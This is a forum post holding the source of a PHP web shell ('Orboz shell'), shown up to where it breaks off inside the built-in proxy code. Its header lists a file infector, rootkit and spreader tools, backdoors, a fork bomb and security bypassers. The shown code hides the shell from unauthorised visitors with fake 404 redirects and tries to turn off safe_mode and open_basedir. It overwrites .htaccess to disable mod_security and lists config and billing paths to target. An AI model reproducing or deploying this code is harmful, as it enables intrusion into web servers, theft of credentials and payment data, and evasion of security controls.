Gonzalez Posted March 7, 2010 Report Share Posted March 7, 2010 <?php/* * Orboz shell .. R57 On steroids * Build: 4 * List of must-makes: * - TODO: More database support; -999% * - TODO: Spoofer Shit; not started * - TODO: Proxy POST Shit * - TODO: Rootkit shit * - TODO: New spread method * - TODO: Import WHMCS Tools; 10% * - TODO: Import vBulluten Tools * - TODO: Import phpBB Tools * - TODO: Search Tool * - TODO: locator * - TODO: Plugins * * Features: * - Shell Killer * - Server quick-info bar: * > Server IP * > Your IP * > Disk space * > Safe_mode Status * > Open_BaseDir Status * > Magic_Quotes Status * > Register globals Status * > System Type * > Server software * > Disabled functions * > ID * > Shell location * > PHP Version * > Check Remote includes * > Read /etc/passwd? * > MySQL Status * > cURL Status * > Check for Root * > /tmp writable? * > getcwd() writable? * - File listing with CHMOD, Rename, Move, Delete functions * - File Infector (Mini-Shell in PHP file) * - Bypassers: cURL, copy(), Perl, ioncube * - Bypassers for Windows: Com wscript.shell, Ffi WinExec * - Locator * - Port Scanner * - Search Files * - Rootkit Tools * - Spreader * - Fork Bomb that launches several methods * - PHP Eval * - Run Shell Script * - Crypt data with: MD5, SHA1, Crypt, CRC32, CRC16, Base64 Encode, Base64 decode, URL encode, URL decode, Bin2Hex, Hex2Bin, Dec2Hex, Hex2Dec, Blowfish, Standard DES, Extended DES, Apr1 md5, Shadow MD5 * - Database Functions: * > MySQL: * * Connect to server * * Manage a database * * Run Queries * * View important information; Table Count, etc * * Dump/Export Table and Database * * Create Tables * * List Proccess * - Backdoor functions: Perl Backdoor, Connect to, Rev3rse Krew BC; with automatic perl location setting * - Server Info; Processor Information, CPU Info, Memory Information * - PhpInfo; With in-the-making bypasser (for blocked phpinfo) * - Built-In Proxy * - Plugins that will allow to add other functions [incom] * * *//* Defaults.. */session_start();@set_magic_quotes_runtime(false);/***********************************\ * Settings *\***********************************//* * ENABLE_PLUGINS * Change to true if you want to enabled plugins */define("ENABLE_PLUGINS", true);/* * DEBUG_MODE * Change to true if you want to show errors */define("DEBUG_MODE", false);/* * ignor0rzz * Ignore all false statments in checkups.. enabled normaly */define("ignor0rzz", true);/* * ACCESS_TYPE * 0 = Regular Access * 1 = I.P. restricted (md5 format) * 2 = Hostname format (md5 format) * 3 = Username/Password Required (md5 format) */define("ACCESS_TYPE", 0);/* * ACCESS_STRING -> THESE ARE ALWAYS MD5'D * If.. * 0 = Regular Access :: Dosen't matter what it is * 1 = I.P. restricted (md5 format) :: md5 your I.P (use ?md5=_YOUR_IP_) * 2 = Hostname format (md5 format) :: md5 your hostname (use ?md5=_hostname) * 3 = Username/Password Required (md5 format) :: md5 both username and password, put in format username:password (use ?md5a=_USERNAME_&md5b=_PASSWORD_) */define("ACCESS_STRING", "14c4b06b824ec593239362517f538b29:5f4dcc3b5aa765d61d8327deb882cf99");/* * END settings DO NOT edit anything else! */define("V", 4);if(version_compare(phpversion(), "4.1.0") == -1) { $_POST = &$HTTP_POST_VARS; $_GET = &$HTTP_GET_VARS; $_SERVER = &$HTTP_SERVER_VARS; $_COOKIE = &$HTTP_COOKIE_VARS;}switch(ACCESS_TYPE) { case 3: if (!isset($_SERVER['PHP_AUTH_USER']) || (md5($_SERVER['PHP_AUTH_USER']) . ":" . md5($_SERVER['PHP_AUTH_PW']))!= ACCESS_STRING) { header('WWW-Authenticate: Basic realm="Passworded Area"'); header('HTTP/1.0 401 Unauthorized'); exit("<h1>401 Unauthorized</h1><p>Your login details are incorrect!</p>"); } break; case 2: /* Send them back a few dirs if there data is wrong.. this can confuse the user and make them lose where the shell is */ if(md5(gethostbyaddr($_SERVER['REMOTE_ADDR'])) != ACCESS_STRING) { header("HTTP/1.0 404 Not Found"); header("Location: ../../../../../../../"); exit(); } break; case 1: if(md5($_SERVER['REMOTE_ADDR']) != ACCESS_STRING) { header("HTTP/1.0 404 Not Found"); header("Location: ../../../../../../../"); exit(); } case 0: default: break;}/* * Plugin System * To use the plugin system, simply link it to the r00t plugin * spot. * * E.G * $plugin[1] = "http://www.example.com/plugin.name"; * * DO NOT EDIT THE FIRST ONE! ($plugin[0] = 0;) SIMPLY ADD * THEM UNDER! * *//* DEFAULT DO NOT CHANGE THIS */$plugins[0] = 0; /* * Name: Shell Updater * Desc: This will check for updates on the shell, it will * add a box to the top of the page if needed. * * TODO: Get an update server *///$plugins[1] = "http://www.todo.com/updater.txt";/* Few bypassers */if(function_exists("ini_alter")) { ini_alter("safe_mode", "off"); ini_alter("open_basedir", "off");}@chmod("./.htaccess", 0777);if(file_exists("./.htaccess") || is_writable("./.htaccess")) { $current_htaccess = file_get_contents("./.htaccess"); $fh = fopen("./.htaccess", "w"); fwrite($fh, "<IfModule mod_security.c> SecFilterEngine Off SecFilterScanPOST Off</IfModule>"); fclose($fh);}$pagestart = microtime();$curl_on = function_exists('curl_version');$mssql_on = function_exists('mssql_connect');$pg_on = function_exists('pg_connect');$ora_on = function_exists('ocilogon');$disable_functions = ini_get("disable_functions");if (!empty($_SERVER['HTTP_CLIENT_IP'])) { $ip = $_SERVER['HTTP_CLIENT_IP'];} elseif (!empty($_SERVER['HTTP_X_FORWARDED_FOR'])) { $ip = $_SERVER['HTTP_X_FORWARDED_FOR'];} else { $ip = $_SERVER['REMOTE_ADDR'];}$int_paths = array("mybb", "phpbb", "phpbb2", "bb", "vb", "vboard", "phpbb3", "forum", "forums", "board", "boards", "bb", "discuss");$config_files = array("config.php", "configuration.php", "settings", "mysql", "vb", "vboard", "phpbb3", "forum", "forums", "board", "boards", "bb", "discuss");$billing_paths = array("whmcs", "cart", "shop", "billing", "", "payments", "bpay", "payway");if($disable_functions == "") { $disable_functions = "None";}if(is_dir("/home/") && is_writable("/home/")) { $home_readable = true;} else { $home_readable = false;}if(is_dir("/root/") && is_writable("/root/")) { $your_root = true;} else { /* * check windows */ if(is_dir("C:/Windows/") && is_writable("C:/Windows/")) { $your_root = true; } else { $your_root = false; }}if(is_dir("/tmp/") && is_writable("/tmp/")) { $tmp_readable = true;} else { $tmp_readable = false;}if(isset($_GET['md5'])) { echo("<h1>Quick MD5 Results</h1>"); if($_GET['md5'] == "_hostname") { echo("Hostname md5'd<br />" . md5(gethostbyaddr($_SERVER['REMOTE_ADDR']))); } else { echo(md5($_GET['md5'])); } exit();}if(isset($_GET['md5a']) || isset($_GET['md5b'])) { echo("<h1>Quick MD5 Results</h1>"); echo(md5($_GET['md5a']) . ":" . md5($_GET['md5b'])); exit();}_loadplugins();if(isset($_GET['go']) && $_GET['go'] == "proxyx") { $_config = array ( 'url_var_name' => 'q', 'flags_var_name' => 'hl', 'get_form_name' => '____pgfa', 'basic_auth_var_name' => '____pbavn', 'max_file_size' => -1, 'allow_hotlinking' => 0, 'upon_hotlink' => 1, 'compress_output' => 0 ); $_flags = array ( 'include_form' => 1, 'remove_scripts' => 0, 'accept_cookies' => 1, 'show_images' => 1, 'show_referer' => 0, 'rotate13' => 1, 'base64_encode' => 1, 'strip_meta' => 1, 'strip_title' => 0, 'session_cookies' => 1 ); $_frozen_flags = array ( 'include_form' => 0, 'remove_scripts' => 0, 'accept_cookies' => 0, 'show_images' => 0, 'show_referer' => 0, 'rotate13' => 0, 'base64_encode' => 0, 'strip_meta' => 0, 'strip_title' => 0, 'session_cookies' => 0 ); $_labels = array ( 'include_form' => array('Include Form', 'Include mini URL-form on every page'), 'remove_scripts' => array('Remove Scripts', 'Remove client-side scripting (i.e JavaScript)'), 'accept_cookies' => array('Accept Cookies', 'Allow cookies to be stored'), 'show_images' => array('Show Images', 'Show images on browsed pages'), 'show_referer' => array('Show Referer', 'Show actual referring Website'), 'rotate13' => array('Rotate13', 'Use ROT13 encoding on the address'), 'base64_encode' => array('Base64', 'Use base64 encodng on the address'), 'strip_meta' => array('Strip Meta', 'Strip meta information tags from pages'), 'strip_title' => array('Strip Title', 'Strip page title'), 'session_cookies' => array('Session Cookies', 'Store cookies for this session only') ); $_hosts = array ( '#^127\.|192\.168\.|10\.|172\.(1[6-9]|2[0-9]|3[01])\.|67.43.227.231|rev3rse.org|www.rev3rse.org#i' ); $_hotlink_domains = array(); $_insert = array(); $_iflags = ''; $_system = array ( 'ssl' => extension_loaded('openssl') && version_compare(PHP_VERSION, '4.3.0', '>='), 'uploads' => ini_get('file_uploads'), 'gzip' => extension_loaded('zlib') && !ini_get('zlib.output_compression'), 'stripslashes' => get_magic_quotes_gpc() ); $_proxify = array('text/html' => 1, 'application/xml+xhtml' => 1, 'application/xhtml+xml' => 1, 'text/css' => 1); $_version = '0.5b2'; $_http_host = isset($_SERVER['HTTP_HOST']) ? $_SERVER['HTTP_HOST'] : (isset($_SERVER['SERVER_NAME']) ? $_SERVER['SERVER_NAME'] : 'localhost'); $_script_url = 'http' . ((isset($_ENV['HTTPS']) && $_ENV['HTTPS'] == 'on') || $_SERVER['SERVER_PORT'] == 443 ? 's' : '') . '://' . $_http_host . ($_SERVER['SERVER_PORT'] != 80 && $_SERVER['SERVER_PORT'] != 443 ? ':' . $_SERVER['SERVER_PORT'] : '') . $_SERVER['PHP_SELF']; $_script_base = substr($_script_url, 0, strrpos($_script_url, '/')+1); $_url = ''; $_url_parts = array(); $_base = array(); $_socket = null; $_request_method = $_SERVER['REQUEST_METHOD']; $_request_headers = ''; $_cookie = ''; $_post_body = ''; $_response_headers = array(); $_response_keys = array(); $_http_version = ''; $_response_code = 0; $_content_type = 'text/html'; $_content_length = false; $_content_disp = ''; $_set_cookie = array(); $_retry = false; $_quit = false; $_basic_auth_header = ''; $_basic_auth_realm = ''; $_auth_creds = array(); $_response_body = ''; function show_report($data) { echo '<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en-US" xml:lang="en-US"> <head> <style type="text/css"> body, input { font-family: "Bitstream Vera Sans", Arial, Helvetica, sans-serif; color: #234; } a { color: #9B9C83; text-decoration:none; border-bottom: 0px; } a:hover { color: #0080FF; } #container { border: 0px; -moz-border-radius: 0px; margin: auto; padding: 0px; width: 700px; } #title { color: #CC6633; margin: 0; } ul#navigation, ul#form { list-style-type: none; padding: 0; margin: 0; } ul#navigation { float: right; } ul#form { clear: both; } ul#navigation li { float: left; margin: 0; padding: 5px 0; border-top: 2px #BFAA9B solid; } ul#navigation li a { font-weight: bold; color: #ffffff; background-color: #AA8E79; padding: 5px 15px; margin-left: 1px; text-decoration: none; border-bottom: 0 #ffffff solid; } ul#navigation li a:hover { color: #44352C; } ul#form li { width: 700px; } #footer { color: #9B9C83; font-size: small; text-align: right; } #address_bar { border-top: 2px #BFAA9B solid; border-bottom: 3px #44352C solid; background-color: #AA8E79; text-align: center; padding: 5px 0; color: #ffffff; } #go { background-color: #ffffff; font-weight: bold; color: #AA8E79; border: 0 #ffffff solid; padding: 2px 5px; } #address_box { width: 500px; } .option { padding: 2px 0; background-color: #EEEBEA; } .option label { border-bottom: 2px #ffffff solid; } form { margin: 0; } #error, #auth { background-color: #BF6464; border-top: 1px solid #44352C; border-bottom: 1px solid #44352C; width: 700px; clear: both; } #auth { background-color: #94C261; } #error p, #auth p, #auth form { margin: 5px; } </style> </head> <body onload="document.getElementById(\'address_box\').focus()"> <div id="container"> <h1><font color="white">r00t-access Shell Proxy</font></h1>'; switch ($data['category']) { case 'auth': echo '<div id="auth"><p> <b>Enter your username and password for "' . htmlspecialchars($data['realm']) . '" on ' . $GLOBALS['_url_parts']['host'] . '</b> <form method="post" action="?go=proxyx"> <input type="hidden" name="' . $GLOBALS['_config']['basic_auth_var_name'] . ' " value="' . base64_encode($data['realm']) . '" /> <label>Username <input type="text" name="username" value="" /></label> <label>Password <input type="password" name="password" value="" /></label> <input type="submit" value="Login" /> </form></p></div>'; break; case 'error': echo '<div id="error"><p>'; switch ($data['group']) { case 'url': echo '<b>URL Error (' . $data['error'] . ')</b>: '; switch ($data['type']) { case 'internal': $message = 'Failed to connect to the specified host. ' . 'Possible problems are that the server was not found, the connection timed out, or the connection refused by the host. ' . 'Try connecting again and check if the address is correct.'; break; case 'external': switch ($data['error']) { case 1: $message = 'The URL you\'re attempting to access is blacklisted by this server. Please select another URL.'; break; case 2: $message = 'The URL you entered is malformed. Please check whether you entered the correct URL or not.'; break; } break; } break; case 'resource': echo '<b>Resource Error:</b> '; switch ($data['type']) { case 'file_size': $message = 'The file your are attempting to download is too large.<br />' . 'Maxiumum permissible file size is <b>' . number_format($GLOBALS['_config']['max_file_size']/1048576, 2) . ' MB</b><br />' . 'Requested file size is <b>' . number_format($GLOBALS['_content_length']/1048576, 2) . ' MB</b>'; break; case 'hotlinking': $message = 'It appears that you are trying to access a resource through this proxy from a remote Website.<br />' . 'For security reasons, please use the form below to do so.'; break; } break; } echo 'An error has occured while trying to browse through the proxy. <br />' . $message . '</p></div>'; break; } ?> <form method="post" action="<?php echo $_SERVER['PHP_SELF'] ?>?go=proxyx"> <ul id="form"> <li id="address_bar"><label>Web Address <input id="address_box" type="text" name="<?php echo $GLOBALS['_config']['url_var_name'] ?>" value="<?php echo isset($GLOBALS['_url']) ? htmlspecialchars($GLOBALS['_url']) : '' ?>" onfocus="this.select()" /></label> <input id="go" type="submit" value="Go" /></li> <?php foreach ($GLOBALS['_flags'] as $flag_name => $flag_value) { if (!$GLOBALS['_frozen_flags'][$flag_name]) { echo '<li class="option"><label><input type="checkbox" name="' . $GLOBALS['_config']['flags_var_name'] . '[' . $flag_name . ']"' . ($flag_value ? ' checked="checked"' : '') . ' />' . $GLOBALS['_labels'][$flag_name][1] . '</label></li>' . "\n"; } } ?> </ul> </form> </div> </body> </html> <?php exit(0); } function add_cookie($name, $value, $expires = 0) { return rawurlencode(rawurlencode($name)) . '=' . rawurlencode(rawurlencode($value)) . (empty($expires) ? '' : '; expires=' . gmdate('D, d-M-Y H:i:s \G\M\T', $expires)) . '; path=/; domain=.' . $GLOBALS['_http_host']; } function set_post_vars($array, $parent_key = null) { $temp = array(); foreach ($array as $key => $value) { $key = isset($parent_key) ? sprintf('%s[%s]', $parent_key, urlencode($key)) : urlencode($key); if (is_array($value)) { $temp = array_merge($temp, set_post_vars($value, $key)); } else { $temp[$key] = urlencode($value); } } return $temp; } function set_post_files($array, $parent_key = null) { $temp = array(); foreach ($array as $key => $value) { $key = isset($parent_key) ? sprintf('%s[%s]', $parent_key, urlencode($key)) : urlencode($key); if (is_array($value)) { $temp = array_merge_recursive($temp, set_post_files($value, $key)); } else if (preg_match('#^([^\[\]]+)\[(name|type|tmp_name)\]#', $key, $m)) { $temp[str_replace($m[0], $m[1], $key)][$m[2]] = $value; } } return $temp; } function url_parse($url, & $container) { $temp = @parse_url($url); if (!empty($temp)) { $temp['port_ext'] = ''; $temp['base'] = $temp['scheme'] . '://' . $temp['host']; if (isset($temp['port'])) { $temp['base'] .= $temp['port_ext'] = ':' . $temp['port']; } else { $temp['port'] = $temp['scheme'] === 'https' ? 443 : 80; } $temp['path'] = isset($temp['path']) ? $temp['path'] : '/'; $path = array(); $temp['path'] = explode('/', $temp['path']); foreach ($temp['path'] as $dir) { if ($dir === '..') { array_pop($path); } else if ($dir !== '.') { for ($dir = rawurldecode($dir), $new_dir = '', $i = 0, $count_i = strlen($dir); $i < $count_i; $new_dir .= strspn($dir{$i}, 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789$-_.+!*\'(),?:@&;=') ? $dir{$i} : rawurlencode($dir{$i}), ++$i); $path[] = $new_dir; } } $temp['path'] = str_replace('/%7E', '/~', '/' . ltrim(implode('/', $path), '/')); $temp['file'] = substr($temp['path'], strrpos($temp['path'], '/')+1); $temp['dir'] = substr($temp['path'], 0, strrpos($temp['path'], '/')); $temp['base'] .= $temp['dir']; $temp['prev_dir'] = substr_count($temp['path'], '/') > 1 ? substr($temp['base'], 0, strrpos($temp['base'], '/')+1) : $temp['base'] . '/'; $container = $temp; return true; } return false; } function complete_url($url, $proxify = true) { $url = trim($url); if ($url === '') { return ''; } $hash_pos = strrpos($url, '#'); $fragment = $hash_pos !== false ? '#' . substr($url, $hash_pos) : ''; $sep_pos = strpos($url, '://'); if ($sep_pos === false || $sep_pos > 5) { switch ($url{0}) { case '/': $url = substr($url, 0, 2) === '//' ? $GLOBALS['_base']['scheme'] . ':' . $url : $GLOBALS['_base']['scheme'] . '://' . $GLOBALS['_base']['host'] . $GLOBALS['_base']['port_ext'] . $url; break; case '?': $url = $GLOBALS['_base']['base'] . '/' . $GLOBALS['_base']['file'] . $url; break; case '#': $proxify = false; break; case 'm': if (substr($url, 0, 7) == 'mailto:') { $proxify = false; break; } default: $url = $GLOBALS['_base']['base'] . '/' . $url; } } return $proxify ? "{$GLOBALS['_script_url']}?{$GLOBALS['_config']['url_var_name']}=" . encode_url($url) . $fragment . "&go=proxyx" : $url . "&go=proxyx"; } function proxify_inline_css($css) { preg_match_all('#url\s*\(\s*(([^)]*(\\\))*[^)]*)(\)|$)?#i', $css, $matches, PREG_SET_ORDER); for ($i = 0, $count = count($matches); $i < $count; ++$i) { $css = str_replace($matches[$i][0], 'url(' . proxify_css_url($matches[$i][1]) . "&go=proxyx" . ')', $css); } return $css; } function proxify_css($css) { $css = proxify_inline_css($css); preg_match_all("#@import\s*(?:\"([^\">]*)\"?|'([^'>]*)'?)([^;]*)(;|$)#i", $css, $matches, PREG_SET_ORDER); for ($i = 0, $count = count($matches); $i < $count; ++$i) { $delim = '"'; $url = $matches[$i][2]; if (isset($matches[$i][3])) { $delim = "'"; $url = $matches[$i][3]; } $css = str_replace($matches[$i][0], '@import ' . $delim . proxify_css_url($matches[$i][1]) . $delim . (isset($matches[$i][4]) ? $matches[$i][4] : ''), $css); } return $css; } function proxify_css_url($url) { $url = trim($url); $delim = strpos($url, '"') === 0 ? '"' : (strpos($url, "'") === 0 ? "'" : ''); return $delim . preg_replace('#([\(\),\s\'"\\\])#', '\\$1', complete_url(trim(preg_replace('#\\\(.)#', '$1', trim($url, $delim))))) . $delim; } if (isset($_POST[$_config['url_var_name']]) && !isset($_GET[$_config['url_var_name']]) && isset($_POST[$_config['flags_var_name']])) { foreach ($_flags as $flag_name => $flag_value) { $_iflags .= isset($_POST[$_config['flags_var_name']][$flag_name]) ? (string)(int)(bool)$_POST[$_config['flags_var_name']][$flag_name] : ($_frozen_flags[$flag_name] ? $flag_value : '0'); } $_iflags = base_convert(($_iflags != '' ? $_iflags : '0'), 2, 16); } else if (isset($_GET[$_config['flags_var_name']]) && !isset($_GET[$_config['get_form_name']]) && ctype_alnum($_GET[$_config['flags_var_name']])) { $_iflags = $_GET[$_config['flags_var_name']]; } else if (isset($_COOKIE['flags']) && ctype_alnum($_COOKIE['flags'])) { $_iflags = $_COOKIE['flags']; } if ($_iflags !== '') { $_set_cookie[] = add_cookie('flags', $_iflags, time()+2419200); $_iflags = str_pad(base_convert($_iflags, 16, 2), count($_flags), '0', STR_PAD_LEFT); $i = 0; foreach ($_flags as $flag_name => $flag_value) { $_flags[$flag_name] = $_frozen_flags[$flag_name] ? $flag_value : (int)(bool)$_iflags{$i}; $i++; } } if ($_flags['rotate13']) { function encode_url($url) { return rawurlencode(str_rot13($url)); } function decode_url($url) { return str_replace(array('&', '&'), '&', str_rot13(rawurldecode($url))); } } else if ($_flags['base64_encode']) { /* *Stop annoying errors in zend */ eval(" function encode_url(\$url) { return rawurlencode(base64_encode(\$url)); } function decode_url(\$url) { return str_replace(array('&', '&'), '&', base64_decode(rawurldecode(\$url))); }"); } else { eval(" function encode_url(\$url) { return rawurlencode(\$url); } function decode_url(\$url) { return str_replace(array('&', '&'), '&', rawurldecode(\$url)); }"); } if ($_config['compress_output'] && $_system['gzip']) { ob_start('ob_gzhandler'); } if ($_system['stripslashes']) { function _stripslashes($value) { return is_array($value) ? array_map('_stripslashes', $value) : (is_string($value) ? stripslashes($value) : $value); } $_GET = _stripslashes($_GET); $_POST = _stripslashes($_POST); $_COOKIE = _stripslashes($_COOKIE); } if (isset($_POST[$_config['url_var_name']]) && !isset($_GET[$_config['url_var_name']])) { header('Location: ' . $_script_url . '?' . $_config['url_var_name'] . '=' . encode_url($_POST[$_config['url_var_name']]) . '&' . $_config['flags_var_name'] . '=' . base_convert($_iflags, 2, 16) . "&go=proxyx"); exit(0); } if (isset($_GET[$_config['get_form_name']])) { $_url = decode_url($_GET[$_config['get_form_name']]); $qstr = strpos($_url, '?') !== false ? (strpos($_url, '?') === strlen($_url)-1 ? '' : '&') : '?'; $arr = explode('&', $_SERVER['QUERY_STRING']); if (preg_match('#^\Q' . $_config['get_form_name'] . '\E#', $arr[0])) { array_shift($arr); } $_url .= $qstr . implode('&', $arr); } else if (isset($_GET[$_config['url_var_name']])) { $_url = decode_url($_GET[$_config['url_var_name']]); } else if (isset($_GET['action']) && $_GET['action'] == 'cookies') { show_report(array('which' => 'cookies')); } else { show_report(array('which' => 'index', 'category' => 'entry_form')); } if (isset($_GET[$_config['url_var_name']], $_POST[$_config['basic_auth_var_name']], $_POST['username'], $_POST['password'])) { $_request_method = 'GET'; $_basic_auth_realm = base64_decode($_POST[$_config['basic_auth_var_name']]); $_basic_auth_header = base64_encode($_POST['username'] . ':' . $_POST['password']); } if (strpos($_url, '://') === false) { $_url = 'http://' . $_url; } if (url_parse($_url, $_url_parts)) { $_base = $_url_parts; if (!empty($_hosts)) { foreach ($_hosts as $host) { if (preg_match($host, $_url_parts['host'])) { show_report(array('which' => 'index', 'category' => 'error', 'group' => 'url', 'type' => 'external', 'error' => 1)); } } } } else { show_report(array('which' => 'index', 'category' => 'error', 'group' => 'url', 'type' => 'external', 'error' => 2)); } if (!$_config['allow_hotlinking'] && isset($_SERVER['HTTP_REFERER'])) { $_hotlink_domains[] = $_http_host; $is_hotlinking = true; foreach ($_hotlink_domains as $host) { if (preg_match('#^https?\:\/\/(www)?\Q' . $host . '\E(\/|\$)#i', trim($_SERVER['HTTP_REFERER']))) { $is_hotlinking = false; break; } } if ($is_hotlinking) { switch ($_config['upon_hotlink']) { case 1: show_report(array('which' => 'index', 'category' => 'error', 'group' => 'resource', 'type' => 'hotlinking')); break; case 2: header('HTTP/1.0 404 Not Found'); exit(0); default: header('Location: ' . $_config['upon_hotlink'] . "?go=proxyx"); exit(0); } } } do { $_retry = false; $_socket = @fsockopen(($_url_parts['scheme'] === 'https' && $_system['ssl'] ? 'ssl://' : 'tcp://') . $_url_parts['host'], $_url_parts['port'], $err_no, $err_str, 30); if ($_socket === false) { show_report(array('which' => 'index', 'category' => 'error', 'group' => 'url', 'type' => 'internal', 'error' => $err_no)); } $_request_headers = $_request_method . ' ' . $_url_parts['path']; if (isset($_url_parts['query'])) { $_request_headers .= '?'; $query = preg_split('#([&;])#', $_url_parts['query'], -1, PREG_SPLIT_DELIM_CAPTURE); for ($i = 0, $count = count($query); $i < $count; $_request_headers .= implode('=', array_map('urlencode', array_map('urldecode', explode('=', $query[$i])))) . (isset($query[++$i]) ? $query[$i] : ''), $i++); } $_request_headers .= " HTTP/1.0\r\n"; $_request_headers .= 'Host: ' . $_url_parts['host'] . $_url_parts['port_ext'] . "\r\n"; if (isset($_SERVER['HTTP_USER_AGENT'])) { $_request_headers .= 'User-Agent: ' . $_SERVER['HTTP_USER_AGENT'] . "\r\n"; } if (isset($_SERVER['HTTP_ACCEPT'])) { $_request_headers .= 'Accept: ' . $_SERVER['HTTP_ACCEPT'] . "\r\n"; } else { $_request_headers .= "Accept: */*;q=0.1\r\n"; } if ($_flags['show_referer'] && isset($_SERVER['HTTP_REFERER']) && preg_match('#^\Q' . $_script_url . '?' . $_config['url_var_name'] . '=\E([^&]+)#', $_SERVER['HTTP_REFERER'], $matches)) { $_request_headers .= 'Referer: ' . decode_url($matches[1]) . "\r\n"; } if (!empty($_COOKIE)) { $_cookie = ''; $_auth_creds = array(); foreach ($_COOKIE as $cookie_id => $cookie_content) { $cookie_id = explode(';', @rawurldecode($cookie_id)); $cookie_content = explode(';', @rawurldecode($cookie_content)); if ($cookie_id[0] === 'COOKIE') { $cookie_id[3] = str_replace('_', '.', $cookie_id[3]); if (count($cookie_id) < 4 || ($cookie_content[1] == 'secure' && $_url_parts['scheme'] != 'https')) { continue; } if ((preg_match('#\Q' . $cookie_id[3] . '\E$#i', $_url_parts['host']) || strtolower($cookie_id[3]) == strtolower('.' . $_url_parts['host'])) && preg_match('#^\Q' . $cookie_id[2] . '\E#', $_url_parts['path'])) { $_cookie .= ($_cookie != '' ? '; ' : '') . (empty($cookie_id[1]) ? '' : $cookie_id[1] . '=') . $cookie_content[0]; } } else if ($cookie_id[0] === 'AUTH' && count($cookie_id) === 3) { $cookie_id[2] = str_replace('_', '.', $cookie_id[2]); if ($_url_parts['host'] . ':' . $_url_parts['port'] === $cookie_id[2]) { $_auth_creds[$cookie_id[1]] = $cookie_content[0]; } } } if ($_cookie != '') { $_request_headers .= "Cookie: $_cookie\r\n"; } } if (isset($_url_parts['user'], $_url_parts['pass'])) { $_basic_auth_header = base64_encode($_url_parts['user'] . ':' . $_url_parts['pass']); } if (!empty($_basic_auth_header)) { $_set_cookie[] = add_cookie("AUTH;{$_basic_auth_realm};{$_url_parts['host']}:{$_url_parts['port']}", $_basic_auth_header); $_request_headers .= "Authorization: Basic {$_basic_auth_header}\r\n"; } else if (!empty($_basic_auth_realm) && isset($_auth_creds[$_basic_auth_realm])) { $_request_headers .= "Authorization: Basic {$_auth_creds[$_basic_auth_realm]}\r\n"; } else if (list($_basic_auth_realm, $_basic_auth_header) = each($_auth_creds)) { $_request_headers .= "Authorization: Basic {$_basic_auth_header}\r\n"; } if ($_request_method == 'POST') { if (!empty($_FILES) && $_system['uploads']) { $_data_boundary = '----' . md5(uniqid(rand(), true)); $array = set_post_vars($_POST); foreach ($array as $key => $value) { $_post_body .= "--{$_data_boundary}\r\n"; $_post_body .= "Content-Disposition: form-data; name=\"$key\"\r\n\r\n"; $_post_body .= urldecode($value) . "\r\n"; } $array = set_post_files($_FILES); foreach ($array as $key => $file_info) { $_post_body .= "--{$_data_boundary}\r\n"; $_post_body .= "Content-Disposition: form-data; name=\"$key\"; filename=\"{$file_info['name']}\"\r\n"; $_post_body .= 'Content-Type: ' . (empty($file_info['type']) ? 'application/octet-stream' : $file_info['type']) . "\r\n\r\n"; if (is_readable($file_info['tmp_name'])) { $handle = fopen($file_info['tmp_name'], 'rb'); $_post_body .= fread($handle, filesize($file_info['tmp_name'])); fclose($handle); } $_post_body .= "\r\n"; } $_post_body .= "--{$_data_boundary}--\r\n"; $_request_headers .= "Content-Type: multipart/form-data; boundary={$_data_boundary}\r\n"; $_request_headers .= "Content-Length: " . strlen($_post_body) . "\r\n\r\n"; $_request_headers .= $_post_body; } else { $array = set_post_vars($_POST); foreach ($array as $key => $value) { $_post_body .= !empty($_post_body) ? '&' : ''; $_post_body .= $key . '=' . $value; } $_request_headers .= "Content-Type: application/x-www-form-urlencoded\r\n"; $_request_headers .= "Content-Length: " . strlen($_post_body) . "\r\n\r\n"; $_request_headers .= $_post_body; $_request_headers .= "\r\n"; } $_post_body = ''; } else { $_request_headers .= "\r\n"; } fwrite($_socket, $_request_headers); $_response_headers = $_response_keys = array(); $line = fgets($_socket, 8192); while (strspn($line, "\r\n") !== strlen($line)) { @list($name, $value) = explode(':', $line, 2); $name = trim($name); $_response_headers[strtolower($name)][] = trim($value); $_response_keys[strtolower($name)] = $name; $line = fgets($_socket, 8192); } sscanf(current($_response_keys), '%s %s', $_http_version, $_response_code); if (isset($_response_headers['content-type'])) { list($_content_type, ) = explode(';', str_replace(' ', '', strtolower($_response_headers['content-type'][0])), 2); } if (isset($_response_headers['content-length'])) { $_content_length = $_response_headers['content-length'][0]; unset($_response_headers['content-length'], $_response_keys['content-length']); } if (isset($_response_headers['content-disposition'])) { $_content_disp = $_response_headers['content-disposition'][0]; unset($_response_headers['content-disposition'], $_response_keys['content-disposition']); } if (isset($_response_headers['set-cookie']) && $_flags['accept_cookies']) { foreach ($_response_headers['set-cookie'] as $cookie) { $name = $value = $expires = $path = $domain = $secure = $expires_time = ''; preg_match('#^\s*([^,\s]*)\s*=?\s*([^;]*)#', $cookie, $match) && list(, $name, $value) = $match; preg_match('#;\s*expires\s*=\s*([^;]*)#i', $cookie, $match) && list(, $expires) = $match; preg_match('#;\s*path\s*=\s*([^;,\s]*)#i', $cookie, $match) && list(, $path) = $match; preg_match('#;\s*domain\s*=\s*([^;,\s]*)#i', $cookie, $match) && list(, $domain) = $match; preg_match('#;\s*(secure\#i', $cookie, $match) && list(, $secure) = $match; $expires_time = empty($expires) ? 0 : intval(@strtotime($expires)); $expires = ($_flags['session_cookies'] && !empty($expires) && time()-$expires_time < 0) ? '' : $expires; $path = empty($path) ? '/' : $path; if (empty($domain)) { $domain = $_url_parts['host']; } else { $domain = '.' . strtolower(str_replace('..', '.', trim($domain, '.'))); if ((!preg_match('#\Q' . $domain . '\E$#i', $_url_parts['host']) && $domain != '.' . $_url_parts['host']) || (substr_count($domain, '.') < 2 && $domain{0} == '.')) { continue; } } if (count($_COOKIE) >= 15 && time()-$expires_time <= 0) { $_set_cookie[] = add_cookie(current($_COOKIE), '', 1); } $_set_cookie[] = add_cookie("COOKIE;$name;$path;$domain", "$value;$secure", $expires_time); } } if (isset($_response_headers['set-cookie'])) { unset($_response_headers['set-cookie'], $_response_keys['set-cookie']); } if (!empty($_set_cookie)) { $_response_keys['set-cookie'] = 'Set-Cookie'; $_response_headers['set-cookie'] = $_set_cookie; } if (isset($_response_headers['p3p']) && preg_match('#policyref\s*=\s*[\'"]?([^\'"\s]*)[\'"]?#i', $_response_headers['p3p'][0], $matches)) { $_response_headers['p3p'][0] = str_replace($matches[0], 'policyref="' . 